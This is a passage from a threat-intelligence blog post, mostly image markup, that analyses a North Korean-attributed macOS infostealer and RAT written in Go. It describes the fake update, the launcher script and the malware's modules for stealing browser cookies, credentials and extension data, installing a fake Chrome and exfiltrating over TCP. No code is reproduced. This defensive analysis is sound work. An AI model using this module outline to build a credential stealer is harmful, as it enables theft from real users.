src="https://substackcdn.com/image/fetch/$s_!bjiH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5d1c9ccf-8596-4f78-a57e-a01da5f6943a_1992x1652.png" width="1456" height="1207" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5d1c9ccf-8596-4f78-a57e-a01da5f6943a_1992x1652.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b134327d-6798-4542-9691-90c46bd3fad7_1992x1652.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1207,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:813288,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb134327d-6798-4542-9691-90c46bd3fad7_1992x1652.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!bjiH!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5d1c9ccf-8596-4f78-a57e-a01da5f6943a_1992x1652.png 424w, https://substackcdn.com/image/fetch/$s_!bjiH!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5d1c9ccf-8596-4f78-a57e-a01da5f6943a_1992x1652.png 848w, https://substackcdn.com/image/fetch/$s_!bjiH!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5d1c9ccf-8596-4f78-a57e-a01da5f6943a_1992x1652.png 1272w, https://substackcdn.com/image/fetch/$s_!bjiH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5d1c9ccf-8596-4f78-a57e-a01da5f6943a_1992x1652.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">More overexplained and over segmented code</figcaption></figure></div><p>But this is just a feather of the Chollima. Let&#8217;s check the <strong>Go components</strong>.</p><div><hr></div><h2>GOTO malware</h2><p>Once decompressed, the fake &#8220;<em>update</em>&#8221; drops a &#8220;<em>drivfixer</em>&#8221; <strong>shell script</strong> to launch the <strong>Go payload</strong>. In a remarkable display of transparency, it spells this out on line six, for reasons unknown to us.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!2LhY!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01523a60-de07-4888-a8b8-f321e5a82835_1756x1322.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!2LhY!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01523a60-de07-4888-a8b8-f321e5a82835_1756x1322.png 424w, https://substackcdn.com/image/fetch/$s_!2LhY!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01523a60-de07-4888-a8b8-f321e5a82835_1756x1322.png 848w, https://substackcdn.com/image/fetch/$s_!2LhY!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01523a60-de07-4888-a8b8-f321e5a82835_1756x1322.png 1272w, https://substackcdn.com/image/fetch/$s_!2LhY!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01523a60-de07-4888-a8b8-f321e5a82835_1756x1322.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!2LhY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01523a60-de07-4888-a8b8-f321e5a82835_1756x1322.png" width="1456" height="1096" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/01523a60-de07-4888-a8b8-f321e5a82835_1756x1322.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/93c84fda-8ec9-4cce-9b71-9ec3ee9792bf_1756x1322.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1096,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:493232,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F93c84fda-8ec9-4cce-9b71-9ec3ee9792bf_1756x1322.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!2LhY!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01523a60-de07-4888-a8b8-f321e5a82835_1756x1322.png 424w, https://substackcdn.com/image/fetch/$s_!2LhY!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01523a60-de07-4888-a8b8-f321e5a82835_1756x1322.png 848w, https://substackcdn.com/image/fetch/$s_!2LhY!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01523a60-de07-4888-a8b8-f321e5a82835_1756x1322.png 1272w, https://substackcdn.com/image/fetch/$s_!2LhY!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F01523a60-de07-4888-a8b8-f321e5a82835_1756x1322.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Thanks for being an honest malware &lt;3</figcaption></figure></div><p>The invoked Go binary is an <strong>infostealer</strong> and <strong>RAT</strong>. It initiates the infection chain by generating a <strong>unique identifie</strong>r for the infected host and importing several dependencies that we analyse later.</p><p>Once again, the code is littered with unnecessary comments and awkward constructions, a textbook example of clanker engineering at its finest.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_Tz2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F594150e2-7d62-4d88-b1d0-ac4dc21509a4_2024x1568.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_Tz2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F594150e2-7d62-4d88-b1d0-ac4dc21509a4_2024x1568.png 424w, https://substackcdn.com/image/fetch/$s_!_Tz2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F594150e2-7d62-4d88-b1d0-ac4dc21509a4_2024x1568.png 848w, https://substackcdn.com/image/fetch/$s_!_Tz2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F594150e2-7d62-4d88-b1d0-ac4dc21509a4_2024x1568.png 1272w, https://substackcdn.com/image/fetch/$s_!_Tz2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F594150e2-7d62-4d88-b1d0-ac4dc21509a4_2024x1568.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_Tz2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F594150e2-7d62-4d88-b1d0-ac4dc21509a4_2024x1568.png" width="1456" height="1128" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/594150e2-7d62-4d88-b1d0-ac4dc21509a4_2024x1568.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0f8f191f-ce37-43ce-b9f2-62f41fe14872_2024x1568.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1128,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:663129,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0f8f191f-ce37-43ce-b9f2-62f41fe14872_2024x1568.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!_Tz2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F594150e2-7d62-4d88-b1d0-ac4dc21509a4_2024x1568.png 424w, https://substackcdn.com/image/fetch/$s_!_Tz2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F594150e2-7d62-4d88-b1d0-ac4dc21509a4_2024x1568.png 848w, https://substackcdn.com/image/fetch/$s_!_Tz2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F594150e2-7d62-4d88-b1d0-ac4dc21509a4_2024x1568.png 1272w, https://substackcdn.com/image/fetch/$s_!_Tz2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F594150e2-7d62-4d88-b1d0-ac4dc21509a4_2024x1568.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">With time and patience, you can climb to the top of the worst coders in multiple languages. Don&#8217;t give up your dreams!</figcaption></figure></div><p>The next function is what we&#8217;ve been looking for: the <strong>infostealer</strong>.</p><p>Thanks to the generously commented code, it&#8217;s fairly easy to understand what it&#8217;s doing in the background: <strong>stealing Chrome extension data, cookies, and saved credentials.</strong></p><p>A classic move. And I&#8217;m fairly certain <strong>we&#8217;ve seen this before</strong>, but no spoilers yet.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!GiRK!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9ffc8507-966b-4b75-b34d-d808c12950c9_2024x1568.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!GiRK!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9ffc8507-966b-4b75-b34d-d808c12950c9_2024x1568.png 424w, https://substackcdn.com/image/fetch/$s_!GiRK!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9ffc8507-966b-4b75-b34d-d808c12950c9_2024x1568.png 848w, https://substackcdn.com/image/fetch/$s_!GiRK!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9ffc8507-966b-4b75-b34d-d808c12950c9_2024x1568.png 1272w, https://substackcdn.com/image/fetch/$s_!GiRK!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9ffc8507-966b-4b75-b34d-d808c12950c9_2024x1568.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!GiRK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9ffc8507-966b-4b75-b34d-d808c12950c9_2024x1568.png" width="1456" height="1128" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9ffc8507-966b-4b75-b34d-d808c12950c9_2024x1568.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/567d81ad-3e4f-475a-af05-4c365686e3c9_2024x1568.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1128,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:763756,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F567d81ad-3e4f-475a-af05-4c365686e3c9_2024x1568.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!GiRK!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9ffc8507-966b-4b75-b34d-d808c12950c9_2024x1568.png 424w, https://substackcdn.com/image/fetch/$s_!GiRK!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9ffc8507-966b-4b75-b34d-d808c12950c9_2024x1568.png 848w, https://substackcdn.com/image/fetch/$s_!GiRK!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9ffc8507-966b-4b75-b34d-d808c12950c9_2024x1568.png 1272w, https://substackcdn.com/image/fetch/$s_!GiRK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9ffc8507-966b-4b75-b34d-d808c12950c9_2024x1568.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Stealing extensions, cookies and logins.</figcaption></figure></div><p>Another notable detail is the amount of unused code left commented out throughout the different files.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!RzxW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F307f9360-14cf-425b-9220-822af0b2c4ee_2024x1568.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!RzxW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F307f9360-14cf-425b-9220-822af0b2c4ee_2024x1568.png 424w, https://substackcdn.com/image/fetch/$s_!RzxW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F307f9360-14cf-425b-9220-822af0b2c4ee_2024x1568.png 848w, https://substackcdn.com/image/fetch/$s_!RzxW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F307f9360-14cf-425b-9220-822af0b2c4ee_2024x1568.png 1272w, https://substackcdn.com/image/fetch/$s_!RzxW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F307f9360-14cf-425b-9220-822af0b2c4ee_2024x1568.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!RzxW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F307f9360-14cf-425b-9220-822af0b2c4ee_2024x1568.png" width="1456" height="1128" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/307f9360-14cf-425b-9220-822af0b2c4ee_2024x1568.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/dd44283f-0ff7-4918-843a-fbd46c1665b6_2024x1568.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1128,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:632767,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/189686575?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdd44283f-0ff7-4918-843a-fbd46c1665b6_2024x1568.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!RzxW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F307f9360-14cf-425b-9220-822af0b2c4ee_2024x1568.png 424w, https://substackcdn.com/image/fetch/$s_!RzxW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F307f9360-14cf-425b-9220-822af0b2c4ee_2024x1568.png 848w, https://substackcdn.com/image/fetch/$s_!RzxW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F307f9360-14cf-425b-9220-822af0b2c4ee_2024x1568.png 1272w, https://substackcdn.com/image/fetch/$s_!RzxW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F307f9360-14cf-425b-9220-822af0b2c4ee_2024x1568.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Commented code chunks are present all over the files.</figcaption></figure></div><p>The remaining execution flow is handed off to several modules, each mapped to one or more files. For simplicity, I&#8217;ll list them without going into detail, <strong>except for one</strong>, no spoilers just yet.</p><ul><li><p><strong>Auto</strong>: Sets paths, defines targeted extensions, and parses cookies.</p></li><li><p><strong>Command</strong>: Executes commands received from the operator.</p></li><li><p><strong>Config</strong>: Self-explanatory, but <strong>we&#8217;ll expand on this later.</strong></p></li><li><p><strong>Core</strong>: Manages the malware&#8217;s communications and handles data exfiltration.</p></li><li><p><strong>ExtProc</strong>: Installs a <strong>fake Google Chrome</strong> instance with pre-installed malicious extensions. Now we understand why the fake macOS app used Google Chrome&#8217;s icon as a disguise!</p></li><li><p><strong>FileOps</strong>: Handles file uploads and downloads.</p></li><li><p><strong>Hardware</strong>: Collects hardware information.</p></li><li><p><strong>Instance</strong>: Checks whether the malware is already running, similar to a mutex.</p></li><li><p><strong>Message</strong>: Sends and receives internal messages.</p></li><li><p><strong>Transport</strong>: Establishes TCP connections.</p></li><li><p><strong>Util</strong>: Provides compression routines.</p></li></ul><p>What&#8217;s so special about <strong>Config</strong> and why I&#8217;m keeping this under a halo of mistery for so long? Well, see by yourself.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!lxh2!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8075d5cd-07d0-48c1-854b-06cad5c72d56_2024x1568.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!lxh2!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8075d5cd-07d0-48c1-854b-06cad5c72d56_2024x1568.png 424w, https://substackcdn.com/image/fetch/$s_!lxh2!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8075d5cd-07d0-48c1-854b-06cad5c72d56_2024x1568.png 848w, https://substackcdn.com/image/fetch/$s_!lxh2!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8075d5cd-07d0-48c1-854b-06cad5c72d56_2024x1568.png 1272w, https://substackcdn.com/image/fetch/$s_!lxh2!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F8075d5cd-07d0-48c1-854b-06cad5c72d56_2024x1568.png 1456w" sizes="100vw"><img 